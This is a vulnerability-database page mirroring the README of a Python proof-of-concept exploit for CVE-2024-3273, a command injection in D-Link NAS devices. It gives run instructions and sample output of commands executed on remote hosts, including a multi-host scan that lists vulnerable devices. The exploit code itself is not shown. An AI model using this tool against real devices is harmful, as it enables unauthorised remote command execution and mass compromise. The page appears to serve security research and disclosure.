关联漏洞
标题:
D-Link DNS-320 命令注入漏洞
(CVE-2024-3273)
描述:D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。 D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
描述
Exploit for CVE-2024-3273, supports single and multiple hosts
介绍
# CVE-2024-3273 Proof of Concept (PoC)
This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
## Description
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the `cgi-bin/nas_sharing.cgi` endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
## Requirements
- Python 3.x
- `requests` library
## Usage
1. Clone this repository:
```bash
git clone https://github.com/adhikara13/CVE-2024-3273.git
```
2. Navigate to the repository directory:
```bash
cd CVE-2024-3273
```
3. Run the PoC:
```bash
python main.py
```
4. Follow the on-screen instructions to choose the target device:
- **Option 1: Single Host (1)**: Enter details for a single target device, including the host IP address and command to run.
- **Option 2: Multiple Hosts (2)**: Provide a file containing multiple target devices in the format `host:port`, and choose whether to export vulnerable hosts to `vulnerables.txt`.
## Example
```
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
```
## Disclaimer
This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.
## Contributing
Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.
文件快照
[4.0K] /data/pocs/88cb9b504aeb82055e14ca3956f3b13c0e8b8c44
├── [ 34K] LICENSE
├── [2.6K] main.py
└── [2.4K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。